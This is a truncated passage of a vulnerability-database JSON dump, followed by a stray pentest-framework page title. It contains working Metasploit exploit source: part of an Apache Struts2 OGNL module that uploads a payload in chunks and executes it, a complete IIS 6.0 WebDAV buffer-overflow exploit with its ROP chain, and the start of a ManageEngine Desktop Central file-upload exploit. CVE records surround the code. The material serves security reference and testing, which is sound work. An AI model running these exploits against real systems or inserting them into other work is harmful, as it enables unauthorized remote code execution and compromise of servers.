ognl_append_file(tempfile, chunk_b64)\n\n payload_cursor = payload_end + 1\n end\n\n ognl_execute(tempfile)\n end\n\n def ognl_append_file(payload_file, payload_chunk)\n data_header = datastore['HEADER'] + 'd'\n file_header = datastore['HEADER'] + 'f'\n headers = {\n \"#{data_header}\": payload_chunk,\n \"#{file_header}\": payload_file,\n }\n\n # d = payload data\n # f = path to temp file\n # s = stream/handle to temp file\n ognl = \"\"\n ognl << %q|(#_memberAccess['allowStaticMethodAccess']=true).| if datastore['ENABLE_STATIC']\n ognl << %Q|(#d=@org.apache.struts2.ServletActionContext@getRequest().getHeader('#{data_header}')).|\n ognl << %Q|(#f=@org.apache.struts2.ServletActionContext@getRequest().getHeader('#{file_header}')).|\n ognl << %q|(#s=new java.io.FileOutputStream(#f,1)).|\n ognl << %q|(#d=new sun.misc.BASE64Decoder().decodeBuffer(#d)).|\n ognl << %q|(#s.write(#d)).|\n ognl << %q|(#s.close()).|\n\n success_string = rand_text_alpha(4)\n ognl << %Q|('#{success_string}')|\n r = send_struts_request(ognl, headers: headers)\n\n begin\n if r.headers['Location'].include? success_string\n vprint_good(\"OGNL payload chunk sent successfully.\")\n return\n else\n fail_with(Failure::UnexpectedReply, \"OGNL payload upload did not respond\")\n end\n rescue\n fail_with(Failure::UnexpectedReply, \"OGNL payload upload failed\")\n end\n end\n\n def ognl_execute(file)\n file_header = datastore['HEADER'] + 'f'\n headers = {\n \"#{file_header}\": file,\n }\n\n # f = path to temp file\n # p = process handle\n ognl = \"\"\n ognl << %q|(#_memberAccess['allowStaticMethodAccess']=true).| if datastore['ENABLE_STATIC']\n ognl << %Q|(#f=@org.apache.struts2.ServletActionContext@getRequest().getHeader('#{file_header}')).|\n ognl << %q|(#p=new java.lang.ProcessBuilder(#f)).|\n ognl << %q|(#p.start()).|\n ognl << %q|(#f.delete()).|\n\n success_string = rand_text_alpha(4)\n ognl << %Q|('#{success_string}')|\n r = send_struts_request(ognl, headers: headers)\n\n begin\n if r.code==302\n print_good(\"OGNL payload executed successfully.\")\n else\n fail_with(Failure::PayloadFailed, \"Target did not successfully execute the request\")\n end\n rescue\n vprint_status(\"TARGET RESPONDED: #{r.to_s}\")\n fail_with(Failure::UnexpectedReply, \"Target reported an unspecified error while attempting to execute the payload\")\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/struts2_namespace_ognl.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-11-02T11:00:06", "description": "Buffer overflow in the ScStoragePathFromUrl function in the WebDAV service in Internet Information Services (IIS) 6.0 in Microsoft Windows Server 2003 R2 allows remote attackers to execute arbitrary code via a long header beginning with \"If: Author(s) Zhiniang Peng Chen Wu Dominic Chell firefart zcgonvh Rich Whitcroft Lincoln Platform Windows\n", "cvss3": {}, "published": "2017-03-28T14:53:18", "type": "metasploit", "title": "Microsoft IIS WebDav ScStoragePathFromUrl Overflow", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-7269"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT-WINDOWS-IIS-IIS_WEBDAV_SCSTORAGEPATHFROMURL-", "href": "https://www.rapid7.com/db/modules/exploit/windows/iis/iis_webdav_scstoragepathfromurl/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ManualRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS WebDav ScStoragePathFromUrl Overflow',\n 'Description' => %q{\n Buffer overflow in the ScStoragePathFromUrl function\n in the WebDAV service in Internet Information Services (IIS) 6.0\n in Microsoft Windows Server 2003 R2 allows remote attackers to\n execute arbitrary code via a long header beginning with\n \"If: <http://\" in a PROPFIND request, as exploited in the\n wild in July or August 2016.\n\n Original exploit by Zhiniang Peng and Chen Wu.\n },\n 'Author' =>\n [\n 'Zhiniang Peng', # Original author\n 'Chen Wu', # Original author\n 'Dominic Chell <dominic@mdsec.co.uk>', # metasploit module\n 'firefart', # metasploit module\n 'zcgonvh <zcgonvh@qq.com>', # metasploit module\n 'Rich Whitcroft', # metasploit module\n 'Lincoln' # minor updates to metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2017-7269' ],\n [ 'BID', '97127' ],\n [ 'URL', 'https://github.com/edwardz246003/IIS_exploit' ],\n [ 'URL', 'https://0patch.blogspot.com/2017/03/0patching-immortal-cve-2017-7269.html' ]\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 2000,\n 'BadChars' => \"\\x00\",\n 'EncoderType' => Msf::Encoder::Type::AlphanumUnicodeMixed,\n 'DisableNops' => 'True',\n 'EncoderOptions' =>\n {\n 'BufferRegister' => 'ESI',\n }\n },\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n 'PrependMigrate' => true,\n },\n 'Targets' =>\n [\n [\n 'Microsoft Windows Server 2003 R2 SP2 x86',\n {\n 'Platform' => 'win',\n 'Arch' => ARCH_X86\n },\n ],\n ],\n 'Platform' => 'win',\n 'DisclosureDate' => '2017-03-26',\n 'DefaultTarget' => 0,\n 'Notes' =>\n {\n 'AKA' => ['EXPLODINGCAN']\n }\n ))\n\n register_options(\n [\n OptString.new('TARGETURI', [ true, 'Path of IIS 6 web application', '/']),\n OptInt.new('MINPATHLENGTH', [ true, 'Start of physical path brute force', 3 ]),\n OptInt.new('MAXPATHLENGTH', [ true, 'End of physical path brute force', 60 ]),\n ])\n end\n\n def min_path_len\n datastore['MINPATHLENGTH']\n end\n\n def max_path_len\n datastore['MAXPATHLENGTH']\n end\n\n def supports_webdav?(headers)\n if headers['MS-Author-Via'] == 'DAV' ||\n headers['DASL'] == '<DAV:sql>' ||\n headers['DAV'] =~ /^[1-9]+(,\\s+[1-9]+)?$/ ||\n headers['Public'].to_s.include?('PROPFIND') ||\n headers['Allow'].to_s.include?('PROPFIND')\n return true\n end\n\n false\n end\n\n def check\n res = send_request_cgi({\n 'uri' => target_uri.path,\n 'method' => 'OPTIONS'\n })\n\n unless res\n vprint_error 'Connection failed'\n return Exploit::CheckCode::Unknown\n end\n\n unless supports_webdav? res.headers\n vprint_status 'Server does not support WebDAV'\n return CheckCode::Safe\n end\n\n if res.headers['Server'].to_s.include? 'IIS/6.0'\n return CheckCode::Vulnerable\n end\n\n CheckCode::Detected\n end\n\n # corelan.be\n # rop chain generated with mona.py\n def create_rop_chain\n [\n #MSVCRT.dll - all Windows 2003\n 0x77bcb06c, # POP ESI # RETN\n 0x77bef001, # Write pointer # Garbage\n 0x77bb2563, # POP EAX # RETN\n 0x77ba1114, # <- *&VirtualProtect()\n 0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN\n 0x41414141, # junk\n 0x77bbee22, # XCHG EAX,ESI # ADD BYTE PTR DS:[EAX],AL # RETN\n 0x77bc9801, # POP EBP # RETN\n 0x77be2265, # ptr to 'push esp # ret'\n 0x77bb2563, # POP EAX # RETN\n 0x03C0946F,\n 0x77bdd441, # SUB EAX, 03c0940f (dwSize, 0x500 -> ebx)\n 0x77bb48d3, # POP EBX, RET\n 0x77bf21e0, # .data\n 0x77bbf102, # XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN\n 0x77bbfc02, # POP ECX # RETN\n 0x77bef001, # W pointer (lpOldProtect) (-> ecx)\n 0x77bd8c04, # POP EDI # RETN\n 0x77bd8c05, # ROP NOP (-> edi)\n 0x77bb2563, # POP EAX # RETN\n 0x03c0944f,\n 0x77bdd441, # SUB EAX, 03c0940f\n 0x77bb8285, # XCHG EAX,EDX # RETN\n 0x77bb2563, # POP EAX # RETN\n 0x90909090, # nop\n 0x77be6591, # PUSHAD # ADD AL,0EF # RETN\n ].pack(\"V*\")\n end\n\n #encode string as UTF-8 char format that when converted to UTF-16LE\n #will represent chars we want in memory\n def utf_encode_str(str)\n str.force_encoding('UTF-16LE').encode('UTF-8')\n end\n\n #filler chars to be encoded\n def make_junk(len)\n utf_encode_str rand_text_alpha(len)\n end\n\n def exploit\n # extract the local servername and port from a PROPFIND request\n # these need to be the values from the backend server\n # if testing a reverse proxy setup, these values differ\n # from RHOST and RPORT but can be extracted this way\n vprint_status('Extracting ServerName and Port')\n res = send_request_raw(\n 'method' => 'PROPFIND',\n 'headers' => {\n 'Content-Length' => 0\n },\n 'uri' => target_uri.path\n )\n fail_with(Failure::BadConfig, 'Server did not respond correctly to WebDAV request') if(res.nil? || res.code != 207)\n\n xml = res.get_xml_document\n url = URI.parse(xml.at(\"//a:response//a:href\").text)\n server_name = url.hostname\n server_port = url.port\n server_scheme = url.scheme\n\n http_host = \"#{server_scheme}://#{server_name}:#{server_port}\"\n vprint_status(\"Using http_host #{http_host}\")\n\n print_status \"Trying path length #{min_path_len} to #{max_path_len} ...\"\n\n min_path_len.upto(max_path_len) do |path_len|\n vprint_status(\"Trying path length of #{path_len}...\")\n\n begin\n buf1 = \"<#{http_host}/\"\n buf1 << rand_text_alpha(114 - path_len)\n buf1 << make_junk(32)\n #survive SHR instruction 0x02020202\n buf1 << utf_encode_str([0x02020202].pack('V'))\n #str pointer to .data httpext.dll # ebp-328 # used in wcslen calculation\n buf1 << utf_encode_str([0x680312c0].pack('V'))\n buf1 << make_junk(40)\n #0x680313c0 -> destination pointer used with memcpy\n buf1 << utf_encode_str([0x680313c0].pack('V'))\n buf1 << \">\"\n buf1 << \" (Not <locktoken:write1>) <#{http_host}/\"\n buf1 << rand_text_alpha(114 - path_len)\n buf1 << make_junk(28)\n #0x680313c0 -> pointer to call itself at same address for vtable call\n buf1 << utf_encode_str([0x680313c0].pack('V'))\n #ROP 2 gadget -> advance ESP past previous instructions to start of ROP chain\n #msvct.dll 0x77bdf38d # ADD ESP,1C # POP ECX # POP EBX # POP EAX # RETN\n buf1 << utf_encode_str([0x77bdf38d].pack('V'))\n buf1 << make_junk(8)\n #0x680313c0 -> vtable pointer passed to EAX for call [eax +24]\n #point to itself at [eax]\n buf1 << utf_encode_str([0x680313c0].pack('V'))\n buf1 << make_junk(16)\n #ROP 1 gadget -> 0x68016082 stack flip get ECX into ESP and push EAX\n #which also points to new ESP\n buf1 << utf_encode_str([0x68016082].pack('V'))\n buf1 << utf_encode_str(create_rop_chain)\n #GetPC # push esp; pop esi; add esi, 10\n buf1 << utf_encode_str(\"\\x54\\x5e\\x83\\xc6\")\n #GetPC ESI +10 plus encode alignment\n buf1 << utf_encode_str(\"\\x0a\\x41\")\n buf1 << payload.encoded\n buf1 << \">\"\n\n vprint_status 'Sending payload'\n res = send_request_raw(\n 'method' => 'PROPFIND',\n 'uri' => target_uri.path,\n 'headers' => {\n 'Content-Length' => 0,\n 'If' => \"#{buf1}\"\n }\n )\n next unless res\n\n vprint_status(\"Server returned status #{res.code}\")\n next if res.code == 502 || res.code == 400\n\n return if session_created?\n\n vprint_status(\"Unknown Response: #{res.code}\")\n rescue ::Errno::ECONNRESET\n vprint_status('got a connection reset')\n next\n end\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/iis/iis_webdav_scstoragepathfromurl.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "cve": [{"lastseen": "2023-12-06T15:18:32", "description": "The FileUploadServlet class in ManageEngine Desktop Central 9 before build 91093 allows remote attackers to upload and execute arbitrary files via the ConnectionId parameter.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-09-28T01:29:00", "type": "cve", "title": "CVE-2015-8249", "cwe": ["CWE-434"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-8249"], "modified": "2017-10-06T15:25:00", "cpe": ["cpe:/a:manageengine:desktop_central:9.0"], "id": "CVE-2015-8249", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-8249", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:manageengine:desktop_central:9.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-12-06T14:13:55", "description": "An issue was discovered on Dasan GPON home routers. It is possible to bypass authentication simply by appending \"?images\" to any URL of the device that requires authentication, as demonstrated by the /menu.html?images/ or /GponForm/diag_FORM?images/ URI. One can then manage the device.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-05-04T03:29:00", "type": "cve", "title": "CVE-2018-10561", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10561"], "modified": "2019-03-04T18:39:00", "cpe": ["cpe:/o:dasannetworks:gpon_router_firmware:-"], "id": "CVE-2018-10561", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-10561", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:dasannetworks:gpon_router_firmware:-:*:*:*:*:*:*:*"]}, {"lastseen": "2023-12-06T14:27:34", "description": "HP Operations Manager 8.10 on Windows contains a \"hidden account\" in the XML file that specifies Tomcat users, which allows remote attackers to conduct unrestricted file upload attacks, and thereby execute arbitrary code, by using the org.apache.catalina.manager.HTMLManagerServlet class to make requests to manager/html/upload.", "cvss3": {}, "published": "2009-11-24T00:30:00", "type": "cve", "title": "CVE-2009-3843", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3843"], "modified": "2017-08-17T01:31:00", "cpe": ["cpe:/a:hp:operations_manager:8.10"], "id": "CVE-2009-3843", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3843", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:hp:operations_manager:8.10:*:windows:*:*:*:*:*"]}, {"lastseen": "2023-12-06T14:15:24", "description": "Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Security). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-10-19T17:29:00", "type": "cve", "title": "CVE-2017-10271", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/a:oracle:weblogic_server:12.1.3.0.0", "cpe:/a:oracle:weblogic_server:12.2.1.2.0", "cpe:/a:oracle:weblogic_server:12.2.1.1.0", "cpe:/a:oracle:weblogic_server:10.3.6.0.0"], "id": "CVE-2017-10271", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-10271", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:oracle:weblogic_server:12.2.1.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.2.1.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.1.3.0.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-12-06T15:30:35", "description": "Buffer overflow in the ScStoragePathFromUrl function in the WebDAV service in Internet Information Services (IIS) 6.0 in Microsoft Windows Server 2003 R2 allows remote attackers to execute arbitrary code via a long header beginning with \"If: <http://\" in a PROPFIND request, as exploited in the wild in July or August 2016.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-03-27T02:59:00", "type": "cve", "title": "CVE-2017-7269", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7269"], "modified": "2023-11-07T02:50:00", "cpe": ["cpe:/a:microsoft:internet_information_server:6.0"], "id": "CVE-2017-7269", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-7269", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:internet_information_server:6.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-12-06T14:21:44", "description": "Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible Remote Code Execution when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then: results are used with no namespace and in same time, its upper package have no or wildcard namespace and similar to results, same possibility when using url tag which doesn't have value and action set and in same time, its upper package have no or wildcard namespace.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-08-22T13:29:00", "type": "cve", "title": "CVE-2018-11776", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2023-11-07T02:51:00", "cpe": ["cpe:/a:apache:struts:2.3.34", "cpe:/a:apache:struts:2.5.16"], "id": "CVE-2018-11776", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-11776", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:apache:struts:2.3.34:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.5.16:*:*:*:*:*:*:*"]}], "packetstorm": [{"lastseen": "2016-12-05T22:15:35", "description": "", "cvss3": {}, "published": "2015-12-14T00:00:00", "type": "packetstorm", "title": "ManageEngine Desktop Central 9 FileUploadServlet ConnectionId", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-8249"], "modified": "2015-12-14T00:00:00", "id": "PACKETSTORM:134806", "href": "https://packetstormsecurity.com/files/134806/ManageEngine-Desktop-Central-9-FileUploadServlet-ConnectionId.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \nrequire 'nokogiri' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => \"ManageEngine Desktop Central 9 FileUploadServlet ConnectionId Vulnerability\", \n'Description' => %q{ \nThis module exploits a vulnerability found in ManageEngine Desktop Central 9. When \nuploading a 7z file, the FileUploadServlet class does not check the user-controlled \nConnectionId parameter in the FileUploadServlet class. This allows a remote attacker to \ninject a null bye at the end of the value to create a malicious file with an arbitrary \nfile type, and then place it under a directory that allows server-side scripts to run, \nwhich results in remote code execution under the context of SYSTEM. \n \nPlease note that by default, some ManageEngine Desktop Central versions run on port 8020, \nbut older ones run on port 8040. Also, using this exploit will leave debugging information \nproduced by FileUploadServlet in file rdslog0.txt. \n \nThis exploit was successfully tested on version 9, build 90109 and build 91084. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ 'sinn3r' ], \n'References' => \n[ \n[ 'URL', 'https://community.rapid7.com/community/infosec/blog/2015/12/14/r7-2015-22-manageengine-desktop-central-9-fileuploadservlet-connectionid-vulnerability-cve-2015-8249' ], \n[ 'CVE', '2015-8249'] \n], \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'ManageEngine Desktop Central 9 on Windows', {} ] \n], \n'Payload' => \n{ \n'BadChars' => \"\\x00\" \n}, \n'Privileged' => false, \n'DisclosureDate' => \"Dec 14 2015\", \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new(

Sn1per v7.0 - Automated Pentest Framework For Offensive Security Experts

Description

Related